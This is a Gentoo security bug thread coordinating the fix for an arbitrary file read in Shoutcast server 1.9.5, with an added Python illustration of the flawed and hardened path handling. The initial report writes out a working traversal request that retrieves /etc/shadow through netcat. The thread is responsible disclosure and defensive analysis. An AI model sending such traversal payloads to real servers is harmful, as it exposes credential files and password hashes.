
Bug 136721

Summary: media-sound/shoutcast-server-bin Arbitrary file read
Product: Gentoo Security
Reporter: Peter Kosinar <goober>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: normal
CC: eradicator, sound
Priority: High
Version: unspecified
Hardware: x86
OS: Linux
URL: http://people.ksp.sk/~goober/advisory/001-shoutcast.html
Whiteboard: B4 [glsa] DerCorny
Package list:
Runtime testing required: ---

Description Peter Kosinar 2006-06-13 16:51:22 UTC
Shoutcast server 1.9.5 allows any remote attacker who can reach the server's port to read arbitrary files on the machine. A sample request can be obtained using the following command:

echo -e "GET /content/%2E./.%2E/%2E%2E/etc/shadow%00.mp3\n"

which, when piped through netcat to the listening Shoutcast server, should show the contents of the /etc/shadow file. The complete advisory (written for a different target audience, though; so it contains some uninteresting details) can be found at http://people.ksp.sk/~goober/advisory/001-shoutcast.html

The vendor (Nullsoft) has NOT been contacted yet, for I failed to find any security contact and didn't feel very much like posting this information to their public forums.
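As an added illustration, not code from Shoutcast (a closed-source binary) nor from the reporter, the following Python reconstructs the kind of request handling the sample above defeats, as far as the description supports it: an ".mp3" extension check applied to the still-encoded URL, percent-decoding that yields "." and a NUL byte, C-style truncation at that NUL, and no canonicalization of the resulting path. The hardened variant decodes first, rejects NUL, checks the extension on the decoded name and verifies the canonical path stays under the content root. CONTENT_ROOT, the "/content/" prefix and the function names are assumptions for the example.

```python
import os
from urllib.parse import unquote

# Assumed on-disk location of the served media; not a Shoutcast default.
CONTENT_ROOT = "/srv/shoutcast/content"
URL_PREFIX = "/content/"


def vulnerable_resolve(request_path):
    """Reconstruction (assumed, from the bug description) of the flawed logic.

    Returns the filesystem path the server would open, or None if rejected.
    """
    # Extension check on the raw, still percent-encoded URL: the trailing
    # ".mp3" is present, so the request passes even though a %00 precedes it.
    if not request_path.endswith(".mp3"):
        return None
    # Percent-decoding turns %2E into '.' and %00 into a NUL byte.
    decoded = unquote(request_path)
    # A C string ends at the first NUL, so ".mp3" vanishes after decoding.
    decoded = decoded.split("\x00", 1)[0]
    if not decoded.startswith(URL_PREFIX):
        return None
    rel = decoded[len(URL_PREFIX):]
    # No normalization: each ".." climbs one directory above CONTENT_ROOT.
    return os.path.join(CONTENT_ROOT, rel)


def hardened_resolve(request_path):
    """Safe counterpart: decode first, reject NUL, then confine to the root."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    if not decoded.startswith(URL_PREFIX):
        return None
    rel = decoded[len(URL_PREFIX):]
    # Extension check on the decoded name, after truncation is impossible.
    if not rel.endswith(".mp3"):
        return None
    root = os.path.realpath(CONTENT_ROOT)
    full = os.path.realpath(os.path.join(root, rel))
    # Canonical path must be the root itself or lie strictly beneath it.
    if os.path.commonpath([root, full]) != root:
        return None
    return full


if __name__ == "__main__":
    # The request from the report, plus a benign one for comparison.
    for path in ("/content/%2E./.%2E/%2E%2E/etc/shadow%00.mp3",
                 "/content/song.mp3"):
        print(path)
        print("  vulnerable ->", vulnerable_resolve(path))
        print("  hardened   ->", hardened_resolve(path))
```

Running the block shows the first request resolving to /etc/shadow under the vulnerable logic and being rejected by the hardened one, while the benign request resolves to a file under the content root in both. The ordering matters as much as the checks themselves: any filter applied before decoding, or any check that a later truncation can invalidate, is a filter the attacker controls.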
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-14 02:56:02 UTC
Jeremy, you touched this one before Chris White. Could you please advise?

@Peter is link public?
Comment 2 Peter Kosinar 2006-06-14 04:09:23 UTC
No, the link is not public and will not become public until the vulnerability is resolved.
Comment 3 Jeremy Huddleston (RETIRED) gentoo-dev 2006-06-16 12:57:01 UTC
Well, this is a binary package.  We can't do anything until upstream releases a new version.  The workarounds are valid, but we can't really force that on users as I'm sure many won't want to not run it in a chroot jail.

As for executing as an unprivileged user, that's a good idea in general, and I don't see why that wasn't the case already.

We need to notify upstream.  I'd look for personal contact info for the developers.  Additionally, I believe NullSoft is still owned by AOL, so you might be able to contact AOL's security team for the contact information.
Comment 4 Peter Kosinar 2006-06-22 15:32:25 UTC
The upstream released a new version for Linux today. Preliminary tests show that the original vulnerability is no longer present, but the changes introduced a new, very similar one. Thus, the actual version (1.9.6) is NOT safe yet.
Comment 5 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-22 15:42:20 UTC
Peter, is upstream informed that it's still flawed?
Comment 6 Peter Kosinar 2006-06-22 15:57:47 UTC
Yes, the vendor has been notified a few minutes ago.
Comment 7 Peter Kosinar 2006-06-23 13:00:33 UTC
Okay, upstream released 1.9.7 today, vulnerabilities (original one + the new ones caused by the first fix) are apparently fixed.
Comment 8 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-24 07:34:19 UTC
eradicator, please bump. Shoutcast mentioned the security issues on their homepage and their board, so this is public. Peter, may we open this bug to the public, too?
Comment 9 Peter Kosinar 2006-06-24 07:48:53 UTC
As the fixed version is available, I see no problems with opening it.
Comment 11 Jeremy Huddleston (RETIRED) gentoo-dev 2006-06-24 22:42:41 UTC
I am on vacation in Hawaii and don't have access to my box to test the new software.

sound: Can someone please bump this and test it?
Comment 12 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-25 06:49:45 UTC
amd64 and x86 please test and mark stable, but beware: I haven't slept for 30h
Comment 13 Raúl Porcel (RETIRED) gentoo-dev 2006-06-28 13:48:27 UTC
Tested on x86 and it works pretty fine; I'm listening to my music right now.
Should be marked as stable.
Comment 14 Chris Gianelloni (RETIRED) gentoo-dev 2006-06-29 12:26:44 UTC
Stable on amd64/x86... thanks for testing...
Comment 15 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-30 08:47:09 UTC
This one is ready for GLSA decision.
Comment 16 Stefan Cornelius (RETIRED) gentoo-dev 2006-06-30 08:55:20 UTC
mhh, weak yes, but I wouldn't mind a no
Comment 18 Wolf Giesen (RETIRED) gentoo-dev 2006-06-30 09:17:56 UTC
Kinda silly, but YES.
Comment 19 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-30 09:19:26 UTC
Voting yes, so let's have one more GLSA.
Comment 20 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-07-09 10:37:19 UTC
GLSA 200607-05